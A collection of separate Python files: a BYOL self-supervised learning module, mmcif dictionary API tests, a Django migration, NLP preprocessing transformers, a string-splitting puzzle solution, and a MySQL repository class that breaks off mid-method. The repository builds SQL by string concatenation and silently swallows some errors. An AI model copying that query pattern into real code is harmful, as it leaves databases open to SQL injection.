import pytorch_lightning as pl
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.utils as vutils
from torchvision import models, transforms
from torch.optim import Adam
from torchsummary import summary
import numpy as np
from byol_pytorch import BYOL
class ContrastiveLearner(pl.LightningModule):
def __init__(self, net, config):
super().__init__()
self.config = config
self.BYOL = BYOL(net=net,
image_size=self.config['exp_params']['image_size'],
hidden_layer=self.config['model_params']['hidden_layer'],
projection_size=self.config['model_params']['projection_size'],
projection_hidden_size=self.config['model_params']['projection_hidden_size'],
moving_average_decay=self.config['model_params']['moving_average_decay'],
use_momentum=True)
def forward(self, x):
return self.BYOL(x)
def configure_optimizers(self):
return Adam(self.parameters(), lr=self.config['exp_params']['LR'], betas=(self.config['exp_params']['beta1'], self.config['exp_params']['beta2']))
def on_before_zero_grad(self, _):
if self.BYOL.use_momentum:
self.BYOL.update_moving_average()
def training_step(self, batch, batch_idx):
loss = self.forward(batch)
self.log('loss', loss, on_step=True, prog_bar=False)
return {"loss": loss}
'''
def validation_step(self, batch, batch_idx):
loss = self.forward(batch)
        # save input and output images at the beginning of the epoch
        # (this block is disabled; `x` and `output` would need to come from the batch
        # and the model's output before it can be enabled)
        if batch_idx == 0:
            self.save_images(x, output, "val_input_output")
return {"val_loss": loss}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x["val_loss"] for x in outputs]).mean()
self.log('avg_val_loss', avg_loss, on_epoch=True, prog_bar=True)
def save_images(self, x, output, name, n=16):
"""
Saves a plot of n images from input and output batch
"""
# make grids and save to logger
grid_top = vutils.make_grid(x[:n,:,:,:], nrow=n)
grid_bottom = vutils.make_grid(output[:n,:,:,:], nrow=n)
grid = torch.cat((grid_top, grid_bottom), 1)
self.logger.experiment.add_image(name, grid, self.current_epoch)
'''
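# --- Usage sketch (not part of the original module): the config keys below mirror the ones
# read in __init__ and configure_optimizers; the backbone choice, hyperparameter values, and
# the commented-out Trainer calls are illustrative assumptions only.
if __name__ == "__main__":
    example_config = {
        'model_params': {
            'hidden_layer': 'avgpool',        # backbone layer BYOL hooks into
            'projection_size': 256,
            'projection_hidden_size': 4096,
            'moving_average_decay': 0.99,
        },
        'exp_params': {
            'image_size': 256,
            'LR': 3e-4,
            'beta1': 0.9,
            'beta2': 0.999,
        },
    }
    backbone = models.resnet50(pretrained=False)  # pretrained=False to avoid a weight download
    learner = ContrastiveLearner(backbone, example_config)
    # trainer = pl.Trainer(max_epochs=10)
    # trainer.fit(learner, train_dataloader)  # train_dataloader should yield image batches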
|
##
# File: DictionaryApiTests.py
# Author: jdw
# Date: 8-Mar-2018
# Version: 0.001
##
"""
Tests cases for Dictionary API.
"""
from __future__ import absolute_import, print_function
import json
import logging
import os
import pprint
import sys
import time
import unittest
from mmcif.api.DictionaryApi import DictionaryApi
from mmcif.api.PdbxContainers import CifName
from mmcif.io.IoAdapterPy import IoAdapterPy as IoAdapter
HERE = os.path.abspath(os.path.dirname(__file__))
TOPDIR = os.path.dirname(os.path.dirname(HERE))
try:
from mmcif import __version__
except ImportError:
sys.path.insert(0, TOPDIR)
from mmcif import __version__
__docformat__ = "google en"
__author__ = "John Westbrook"
__email__ = "jwest@rcsb.rutgers.edu"
__license__ = "Apache 2.0"
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s]-%(module)s.%(funcName)s: %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class DictionaryApiTests(unittest.TestCase):
def setUp(self):
self.__lfh = sys.stderr
self.__verbose = False
self.__pathPdbxDictionary = os.path.join(HERE, "data", "mmcif_pdbx_v5_next.dic")
self.__pathPdbxDictionaryExtension = os.path.join(HERE, "data", "pdbx-dictionary-extensions-examples.dic")
self.__containerList = None
self.__startTime = time.time()
logger.debug("Running tests on version %s", __version__)
logger.debug("Starting %s at %s", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()))
def tearDown(self):
endTime = time.time()
logger.debug("Completed %s at %s (%.4f seconds)", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()), endTime - self.__startTime)
#
def testExtensions(self):
"""Test case - condition extensions"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
self.__containerList.extend(myIo.readFile(inputFilePath=self.__pathPdbxDictionaryExtension))
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True)
tD = dApi.getItemValueConditionDict()
logger.debug("tD \n%s", pprint.pformat(tD))
self.assertGreaterEqual(len(tD), 2)
tD = dApi.getComparisonOperatorDict()
logger.debug("tD \n%s", pprint.pformat(tD))
self.assertGreaterEqual(len(tD), 5)
tL = dApi.getComparisonOperators()
logger.debug("tL %r", tL)
self.assertGreaterEqual(len(tL), 5)
#
tD = dApi.getItemLinkedConditions()
logger.debug("tD \n%s", pprint.pformat(tD))
self.assertGreaterEqual(len(tD), 1)
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testExtendedEnums(self):
"""Test case - to verify extended enums -"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
#
eList = dApi.getEnumListWithFullDetails(category="chem_comp", attribute="mon_nstd_flag")
logger.info("Item Enum list sorted %r\n", eList)
self.assertGreaterEqual(len(eList), 4)
eList = dApi.getEnumListWithFullDetails(category="atom_site", attribute="refinement_flags_occupancy")
logger.info("Item Enum list sorted %r\n", eList)
self.assertGreaterEqual(len(eList), 1)
#
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testDumpEnums(self):
"""Test case - to verify enum ordering -"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
#
eList = dApi.getEnumListAlt(category="pdbx_audit_support", attribute="country")
logger.debug("Item %s Enum list sorted %r\n", "country", eList)
eList = dApi.getEnumListAlt(category="pdbx_audit_support", attribute="country", sortFlag=False)
logger.debug("Item %s Enum list unsorted %r\n", "country", eList)
eList = dApi.getEnumListAltWithDetail(category="pdbx_audit_support", attribute="country")
logger.debug("Item %s Enum with detail list %r\n", "country", eList)
self.assertGreater(len(eList), 100)
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testDumpIndex(self):
"""Test case - dump methods for dictionary metadata"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
if self.__verbose:
dApi.dumpCategoryIndex(fh=self.__lfh)
logger.debug("Index = %r\n", dApi.getItemNameList("pdbx_nmr_spectral_dim"))
logger.debug("Index = %r\n", dApi.getAttributeNameList("pdbx_nmr_spectral_dim"))
catIndex = dApi.getCategoryIndex()
logger.debug("Index = %r\n", catIndex["pdbx_nmr_spectral_dim"])
self.assertIsNotNone(catIndex["pdbx_nmr_spectral_dim"])
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testDumpDictionary(self):
"""Test case - dump methods for dictionary metadata"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
# dApi.dumpCategoryIndex(fh=self.__lfh)
# dApi.dumpEnumFeatures(fh=self.__lfh)
# dApi.dumpFeatures(fh=self.__lfh)
# dApi.dumpMethods(fh=self.__lfh)
logger.debug("+++++++++++++++++++++++++++++++++++++++++++++++++++++++\n")
groupList = dApi.getCategoryGroups()
logger.debug("groupList %s\n", groupList)
for group in groupList:
logger.debug("Group %s category list %s\n", group, dApi.getCategoryGroupCategories(groupName=group))
self.assertGreater(len(groupList), 10)
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testConsolidateDictionary(self):
"""Test case - dump methods for dictionary metadata"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, expandItemLinked=False, verbose=self.__verbose)
for itemName in [
"_entity.id",
"_entity_poly_seq.num",
"_atom_site.label_asym_id",
"_struct_asym.id",
"_chem_comp.id",
"chem_comp_atom.comp_id",
"chem_comp_bond.comp_id",
]:
categoryName = CifName.categoryPart(itemName)
attributeName = CifName.attributePart(itemName)
logger.debug("Full parent list for %s : %s\n", itemName, dApi.getFullParentList(categoryName, attributeName))
logger.debug("Full child list for %s : %s\n", itemName, dApi.getFullChildList(categoryName, attributeName))
logger.debug("Ultimate parent for %s : %s\n", itemName, dApi.getUltimateParent(categoryName, attributeName))
logger.debug("Type code for %s : %s\n", itemName, dApi.getTypeCode(categoryName, attributeName))
self.assertIsNotNone(dApi.getTypeCode(categoryName, attributeName))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testGetAdjacentCategories(self):
"""Test case -"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
cList = dApi.getCategoryList()
cI = {}
for cV in cList:
chL = dApi.getChildCategories(cV)
pL = dApi.getParentCategories(cV)
for ch in chL:
if (ch, cV) not in cI:
cI[(ch, cV)] = 1
else:
cI[(ch, cV)] += 1
for pV in pL:
if (cV, pV) not in cI:
cI[(cV, pV)] = 1
else:
cI[(cV, pV)] += 1
linkL = []
for tup in cI:
dD = {"source": tup[0], "target": tup[1], "type": "link"}
linkL.append(dD)
if self.__verbose:
print(json.dumps(linkL, sort_keys=True, indent=4, separators=(",", ": ")))
self.assertGreater(len(linkL), 50)
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def suiteIndexTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testDumpIndex"))
return suiteSelect
def suiteDictionaryApiTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testDumpDictionary"))
return suiteSelect
def suiteConsolidateTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testConsolidateDictionary"))
return suiteSelect
def suiteAdjacentTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testGetAdjacentCategories"))
return suiteSelect
def suiteDictionaryApiEnumTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testDumpEnums"))
return suiteSelect
if __name__ == "__main__":
mySuite = suiteDictionaryApiTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
mySuite = suiteConsolidateTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
mySuite = suiteAdjacentTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
mySuite = suiteDictionaryApiEnumTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
mySuite = suiteIndexTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
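# The test class can also be run through unittest discovery or pytest (assuming the
# dictionary files referenced in setUp() are present under ./data), e.g.:
#   python -m unittest DictionaryApiTests -v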
|
# Generated by Django 2.2.9 on 2020-02-19 21:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("course_flow", "0001_initial"),
]
operations = [
migrations.AlterModelOptions(
name="activity",
options={
"verbose_name": "Activity",
"verbose_name_plural": "Activities",
},
),
migrations.AlterModelOptions(
name="componentprogram",
options={
"verbose_name": "Component-Program Link",
"verbose_name_plural": "Component-Program Links",
},
),
migrations.AlterModelOptions(
name="componentweek",
options={
"verbose_name": "Component-Week Link",
"verbose_name_plural": "Component-Week Links",
},
),
migrations.AlterModelOptions(
name="nodestrategy",
options={
"verbose_name": "Node-Strategy Link",
"verbose_name_plural": "Node-Strategy Links",
},
),
migrations.AlterModelOptions(
name="outcome",
options={
"verbose_name": "Outcome",
"verbose_name_plural": "Outcomes",
},
),
migrations.AlterModelOptions(
name="outcomeactivity",
options={
"verbose_name": "Outcome-Activity Link",
"verbose_name_plural": "Outcome-Activity Links",
},
),
migrations.AlterModelOptions(
name="outcomeartifact",
options={
"verbose_name": "Outcome-Artifact Link",
"verbose_name_plural": "Outcome-Artifact Links",
},
),
migrations.AlterModelOptions(
name="outcomeassessment",
options={
"verbose_name": "Outcome-Assessment Link",
"verbose_name_plural": "Outcome-Assessment Links",
},
),
migrations.AlterModelOptions(
name="outcomecourse",
options={
"verbose_name": "Outcome-Course Link",
"verbose_name_plural": "Outcome-Course Links",
},
),
migrations.AlterModelOptions(
name="outcomenode",
options={
"verbose_name": "Outcome-Node Link",
"verbose_name_plural": "Outcome-Node Links",
},
),
migrations.AlterModelOptions(
name="outcomepreparation",
options={
"verbose_name": "Outcome-Preparation Link",
"verbose_name_plural": "Outcome-Preparation Links",
},
),
migrations.AlterModelOptions(
name="outcomeprogram",
options={
"verbose_name": "Outcome-Program Link",
"verbose_name_plural": "Outcome-Program Links",
},
),
migrations.AlterModelOptions(
name="outcomestrategy",
options={
"verbose_name": "Outcome-Strategy Link",
"verbose_name_plural": "Outcome-Strategy Links",
},
),
migrations.AlterModelOptions(
name="outcomeweek",
options={
"verbose_name": "Outcome-Week Link",
"verbose_name_plural": "Outcome-Week Links",
},
),
migrations.AlterModelOptions(
name="strategy",
options={
"verbose_name": "Strategy",
"verbose_name_plural": "Strategies",
},
),
migrations.AlterModelOptions(
name="strategyactivity",
options={
"verbose_name": "Strategy-Activity Link",
"verbose_name_plural": "Strategy-Activity Links",
},
),
migrations.AlterModelOptions(
name="weekcourse",
options={
"verbose_name": "Week-Course Link",
"verbose_name_plural": "Week-Course Links",
},
),
migrations.AddField(
model_name="activity",
name="static",
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name="course",
name="static",
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name="node",
name="author",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="author",
to=settings.AUTH_USER_MODEL,
),
),
migrations.CreateModel(
name="NodeCompletionStatus",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("is_completed", models.BooleanField(default=False)),
(
"node",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="course_flow.Node",
),
),
(
"student",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"verbose_name": "Node Completion Status",
"verbose_name_plural": "Node Completion Statuses",
},
),
migrations.CreateModel(
name="ComponentCompletionStatus",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("is_completed", models.BooleanField(default=False)),
(
"component",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="course_flow.Component",
),
),
(
"student",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"verbose_name": "Component Completion Status",
"verbose_name_plural": "Component Completion Statuses",
},
),
migrations.AddField(
model_name="node",
name="students",
field=models.ManyToManyField(
blank=True,
related_name="students",
through="course_flow.NodeCompletionStatus",
to=settings.AUTH_USER_MODEL,
),
),
]
|
#!/usr/bin/env python
# Copyright 2021 Marcelo Sanches
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Attributions
#
# The expand_contractions function and WordCounterToVectorTransformer
# class are verbatim copies from Dipanjan Sarkar and Aurelien Geron's
# work.
#
# The other three classes were the focus of my efforts, yet were heavily
# adapted from A. Geron's original class in his famous classification
# notebook from his book: Hands-On Machine Learning with Scikit-Learn,
# Keras, and TensorFlow published by O'Reilly.
#
# See code for specific attributions and links.
import re
import os
import time
import json
import numpy as np
import pandas as pd
import urlextract
from html import unescape
from nltk.util import ngrams
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from scipy.sparse import csr_matrix
from collections import Counter
from sklearn.base import BaseEstimator, TransformerMixin
# The expand_contractions function was written by Dipanjan Sarkar,
# Data Science Lead at Applied Materials, kdnuggets.com contributor,
# author of Practical Machine Learning with Python (Apache 2.0 License)
# https://github.com/dipanjanS/practical-machine-learning-with-python
# https://www.kdnuggets.com/2018/08/practitioners-guide-processing-understanding-text-2.html
# load contractions map
with open("contractions_map.json") as f:
contractions_map = json.load(f)
def expand_contractions(text, contractions_map):
pattern = re.compile('({})'.format('|'.join(contractions_map.keys())),
flags=re.IGNORECASE|re.DOTALL)
def expand_match(contraction):
match = contraction.group(0)
first_char = match[0]
expanded_contraction = contractions_map.get(match)\
if contractions_map.get(match)\
else contractions_map.get(match.lower())
expanded_contraction = first_char+expanded_contraction[1:]
return expanded_contraction
expanded_text = pattern.sub(expand_match, text)
expanded_text = re.sub("'", "", expanded_text)
return expanded_text
def is_ascii(doc):
try:
doc.encode(encoding='utf-8').decode('ascii')
except UnicodeDecodeError:
return False
else:
return True
# instantiate url extractor and lemmatizer
url_extractor = urlextract.URLExtract()
lemmatizer = WordNetLemmatizer()
# The three Word-to-Counter transformer classes were heavily adapted from
# A. Geron's classification notebook:
# In [152]: class EmailToWordCounterTransformer
# https://github.com/ageron/handson-ml/blob/master/03_classification.ipynb
class DocumentToWordCounterTransformer(BaseEstimator, TransformerMixin):
def __init__(self, expand_contractions=True, lower_case=True,
replace_usernames=True, unescape_html=True,
replace_urls=True, replace_numbers=True,
remove_junk=True, remove_punctuation=True,
replace_emojis=True, replace_nonascii=True,
remove_stopwords=True, lemmatization=True):
self.expand_contractions = expand_contractions
self.lower_case = lower_case
self.replace_usernames = replace_usernames
self.unescape_html = unescape_html
self.replace_urls = replace_urls
self.replace_numbers = replace_numbers
self.remove_junk = remove_junk
self.remove_punctuation = remove_punctuation
self.replace_emojis = replace_emojis
self.replace_nonascii = replace_nonascii
self.remove_stopwords = remove_stopwords
self.lemmatization = lemmatization
def fit(self, X, y=None):
return self
def transform(self, X, y=None):
X_transformed = []
for doc in X:
if self.lower_case:
doc = doc.lower()
if self.expand_contractions and contractions_map is not None:
doc = expand_contractions(doc, contractions_map)
if self.replace_usernames:
doc = re.sub(r'^@([^\s]+)',' USR ', doc)
if self.unescape_html:
doc = unescape(doc)
if self.replace_urls and url_extractor is not None:
urls = list(set(url_extractor.find_urls(doc)))
urls.sort(key=lambda url: len(url), reverse=True)
for url in urls:
doc = doc.replace(url, ' URL ')
if self.replace_numbers:
doc = re.sub(r'\d+(?:\.\d*(?:[eE]\d+))?', ' NUM ', doc)
if self.remove_punctuation:
doc = re.sub(r'\W+', ' ', doc, flags=re.M)
if self.remove_junk:
                pattern = (r'¥|â|«|»|Ñ|Ð|¼|½|¾|¿|\x82|\x83|\x84|\x85|\x86'
                           r'|\x87|\x88|\x89|\x8a|\x8b|\x8c|\x8d|\x8e'
                           r'|°|µ|´|º|¹|³')
doc = re.sub(pattern,'', doc)
if self.replace_emojis:
doc = re.sub(r'[^\x00-\x7F]+', ' EMOJI ', doc)
if self.replace_nonascii:
if is_ascii(doc) == False:
doc = ' NONASCII '
word_counts = Counter(doc.split())
if self.remove_stopwords:
# 25 semantically non-selective words from the Reuters-RCV1 dataset
stop_words = ['a','an','and','are','as','at','be','by','for','from',
'has','he','in','is','it','its','of','on','that','the',
'to','was','were','will','with']
for word in stop_words:
try:
word_counts.pop(word)
except KeyError:
continue
if self.lemmatization and lemmatizer is not None:
lemmatized_word_counts = Counter()
for word, count in word_counts.items():
lemmatized_word = lemmatizer.lemmatize(word)
lemmatized_word_counts[lemmatized_word] += count
word_counts = lemmatized_word_counts
X_transformed.append(word_counts)
return np.array(X_transformed)
class DocumentToBigramCounterTransformer(BaseEstimator, TransformerMixin):
def __init__(self, expand_contractions=True, lower_case=True,
replace_usernames=True, unescape_html=True,
replace_urls=True, replace_numbers=True,
remove_junk=True, remove_punctuation=True,
replace_emojis=True, replace_nonascii=True,
remove_stopwords=True, lemmatization=True,
bigrams=True):
self.expand_contractions = expand_contractions
self.lower_case = lower_case
self.replace_usernames = replace_usernames
self.unescape_html = unescape_html
self.replace_urls = replace_urls
self.replace_numbers = replace_numbers
self.remove_junk = remove_junk
self.remove_punctuation = remove_punctuation
self.replace_emojis = replace_emojis
self.replace_nonascii = replace_nonascii
self.remove_stopwords = remove_stopwords
self.lemmatization = lemmatization
self.bigrams = bigrams
def fit(self, X, y=None):
return self
def transform(self, X, y=None):
X_transformed = []
for doc in X:
if self.lower_case:
doc = doc.lower()
if self.expand_contractions and contractions_map is not None:
doc = expand_contractions(doc, contractions_map)
if self.replace_usernames:
doc = re.sub(r'^@([^\s]+)',' USR ', doc)
if self.unescape_html:
doc = unescape(doc)
if self.replace_urls and url_extractor is not None:
urls = list(set(url_extractor.find_urls(doc)))
urls.sort(key=lambda url: len(url), reverse=True)
for url in urls:
doc = doc.replace(url, ' URL ')
if self.replace_numbers:
doc = re.sub(r'\d+(?:\.\d*(?:[eE]\d+))?', ' NUM ', doc)
if self.remove_punctuation:
doc = re.sub(r'\W+', ' ', doc, flags=re.M)
if self.remove_junk:
                pattern = (r'¥|â|«|»|Ñ|Ð|¼|½|¾|¿|\x82|\x83|\x84|\x85|\x86'
                           r'|\x87|\x88|\x89|\x8a|\x8b|\x8c|\x8d|\x8e'
                           r'|°|µ|´|º|¹|³')
doc = re.sub(pattern,'', doc)
if self.replace_emojis:
doc = re.sub(r'[^\x00-\x7F]+', ' EMOJI ', doc)
if self.replace_nonascii:
if is_ascii(doc) == False:
doc = ' NONASCII '
# tokenize
tokens = doc.split()
if self.remove_stopwords:
stop_words = ['a','an','and','are','as','at','be','by','for','from',
'has','he','in','is','it','its','of','on','that','the',
'to','was','were','will','with']
tokens = [t for t in tokens if t not in stop_words]
if self.lemmatization and lemmatizer is not None:
tokens = [lemmatizer.lemmatize(t) for t in tokens]
if self.bigrams:
bigrams = ngrams(word_tokenize(doc), 2)
bigrams = ['_'.join(grams) for grams in bigrams]
tokens = [*tokens, *bigrams]
# include counts
tokens_counts = Counter(tokens)
# append to list
X_transformed.append(tokens_counts)
return np.array(X_transformed)
class DocumentToNgramCounterTransformer(BaseEstimator, TransformerMixin):
def __init__(self, expand_contractions=True, lower_case=True,
replace_usernames=True, unescape_html=True,
replace_urls=True, replace_numbers=True,
remove_junk=True, remove_punctuation=True,
replace_emojis=True, replace_nonascii=True,
remove_stopwords=True, lemmatization=True,
n_grams=2 # defaults to bigram
):
self.expand_contractions = expand_contractions
self.lower_case = lower_case
self.replace_usernames = replace_usernames
self.unescape_html = unescape_html
self.replace_urls = replace_urls
self.replace_numbers = replace_numbers
self.remove_junk = remove_junk
self.remove_punctuation = remove_punctuation
self.replace_emojis = replace_emojis
self.replace_nonascii = replace_nonascii
self.remove_stopwords = remove_stopwords
self.lemmatization = lemmatization
self.n_grams = n_grams
def fit(self, X, y=None):
return self
def transform(self, X, y=None):
X_transformed = []
for doc in X:
if self.lower_case:
doc = doc.lower()
if self.expand_contractions and contractions_map is not None:
doc = expand_contractions(doc, contractions_map)
if self.replace_usernames:
doc = re.sub(r'^@([^\s]+)',' USR ', doc)
if self.unescape_html:
doc = unescape(doc)
if self.replace_urls and url_extractor is not None:
urls = list(set(url_extractor.find_urls(doc)))
urls.sort(key=lambda url: len(url), reverse=True)
for url in urls:
doc = doc.replace(url, ' URL ')
if self.replace_numbers:
doc = re.sub(r'\d+(?:\.\d*(?:[eE]\d+))?', ' NUM ', doc)
if self.remove_punctuation:
doc = re.sub(r'\W+', ' ', doc, flags=re.M)
if self.remove_junk:
                pattern = (r'¥|â|«|»|Ñ|Ð|¼|½|¾|¿|\x82|\x83|\x84|\x85|\x86'
                           r'|\x87|\x88|\x89|\x8a|\x8b|\x8c|\x8d|\x8e'
                           r'|°|µ|´|º|¹|³')
doc = re.sub(pattern,'', doc)
if self.replace_emojis:
doc = re.sub(r'[^\x00-\x7F]+', ' EMOJI ', doc)
if self.replace_nonascii:
if is_ascii(doc) == False:
doc = ' NONASCII '
# tokenize
tokens = doc.split()
if self.remove_stopwords:
stop_words = ['a','an','and','are','as','at','be','by','for','from',
'has','he','in','is','it','its','of','on','that','the',
'to','was','were','will','with']
tokens = [t for t in tokens if t not in stop_words]
if self.lemmatization and lemmatizer is not None:
tokens = [lemmatizer.lemmatize(t) for t in tokens]
if self.n_grams:
for i in range(2, self.n_grams+1): # fix doubling of unigrams
grams = ngrams(word_tokenize(doc), i)
grams = ['_'.join(gram) for gram in grams]
tokens = [*tokens, *grams]
# include counts
tokens_counts = Counter(tokens)
# append to list
X_transformed.append(tokens_counts)
return np.array(X_transformed)
# The WordCounterToVectorTransformer transformer class is a verbatim copy from
# A. Geron's classification notebook:
# In [154]:
# https://github.com/ageron/handson-ml/blob/master/03_classification.ipynb
class WordCounterToVectorTransformer(BaseEstimator, TransformerMixin):
def __init__(self, vocabulary_size=1000):
self.vocabulary_size = vocabulary_size
def fit(self, X, y=None):
total_count = Counter()
for word_count in X:
for word, count in word_count.items():
total_count[word] += min(count, 10)
most_common = total_count.most_common()[:self.vocabulary_size]
self.most_common_ = most_common
self.vocabulary_ = {word: index + 1 for index, (word, count) in enumerate(most_common)}
return self
def transform(self, X, y=None):
rows = []
cols = []
data = []
for row, word_count in enumerate(X):
for word, count in word_count.items():
rows.append(row)
cols.append(self.vocabulary_.get(word, 0))
data.append(count)
return csr_matrix((data, (rows, cols)), shape=(len(X), self.vocabulary_size + 1))
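# --- Usage sketch (illustrative, not part of the original script): wiring the counter and
# vectorizer into a scikit-learn Pipeline. The sample documents are invented; running this
# assumes contractions_map.json and the NLTK wordnet data are available, which the module
# itself already requires.
if __name__ == "__main__":
    from sklearn.pipeline import Pipeline

    sample_docs = [
        "I can't believe it's already 2021! Check https://example.com",
        "@user this is the best movie of the year, 10/10",
    ]
    text_pipeline = Pipeline([
        ("count", DocumentToWordCounterTransformer()),
        ("vectorize", WordCounterToVectorTransformer(vocabulary_size=50)),
    ])
    X = text_pipeline.fit_transform(sample_docs)
    print(X.shape)  # (2, 51): one extra column collects out-of-vocabulary words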
|
class Solution:
"""
Time Complexity: O(N)
Space Complexity: O(1)
"""
def balanced_string_split(self, s: str) -> int:
# initialize variables
L_count, R_count = 0, 0
balanced_substring_count = 0
# parse the string
for char in s:
# update the number of Ls and the number of Rs so far
if char == 'L':
L_count += 1
elif char == 'R':
R_count += 1
# if the string is balanced, increment the balanced substrings count and reset the counters
if L_count == R_count:
balanced_substring_count += 1
L_count, R_count = 0, 0
return balanced_substring_count
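# Quick sanity check (illustrative, not part of the original solution): every time the
# running counts of 'L' and 'R' match, one balanced substring is closed.
if __name__ == "__main__":
    solution = Solution()
    assert solution.balanced_string_split("RLRRLLRLRL") == 4   # RL | RRLL | RL | RL
    assert solution.balanced_string_split("RLLLLRRRLR") == 3   # RL | LLLRRR | LR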
|
import mysql.connector
from Repositories.BaseRepository import Repository
from mysql.connector import errorcode
class SqlRepo(Repository):
'''
    A generic SQL-backed repository for a given domain class
'''
def __init__(self, config, objFromSql, objToSql, db, db_params):
'''
        The constructor of the SQL repository class
        :param config: mysql.connector connection settings (passed to mysql.connector.connect)
        :param objFromSql: callable that builds a domain object from a result row
        :param objToSql: callable that turns a domain object into a list of column values
        :param db: the name of the table this repository operates on
        :param db_params: the column list used in INSERT statements, e.g. "(id, name)"
'''
super().__init__()
self.__config = config
self.__objFromSql = objFromSql
self.__objToSql = objToSql
self.__db = db
self.__db_params = db_params
def getItemById(self, itemId):
command = "SELECT * FROM " + self.__db + " where id = " + str(itemId)
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
data = cursor.fetchall()
cnx.commit()
if len(data) > 0:
return self.__objFromSql(*data[0])
return False
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
pass
else:
cnx.close()
def executeSqlCommand(self, command):
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
data = cursor.fetchall()
cnx.commit()
return self.__objFromSql(*data[0])
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
pass
else:
cnx.close()
def getAllLines(self):
'''
        A function that returns all the rows from the table
        :return: a list of objects built with objFromSql, one per row
'''
command = "SELECT * from " + self.__db
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
data = cursor.fetchall()
cnx.commit()
return list(map(lambda x: self.__objFromSql(*x), data))
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
raise ValueError(err)
else:
cnx.close()
def createItem(self, item):
'''
        Creates a new item in the repository and inserts it into the table as a new row
        :param item: object - the item we want to add to the repository
        :return: True if there were no errors and the new item was successfully added
'''
        # NOTE: getItemById expects an id; the duplicate check below only works if `item`
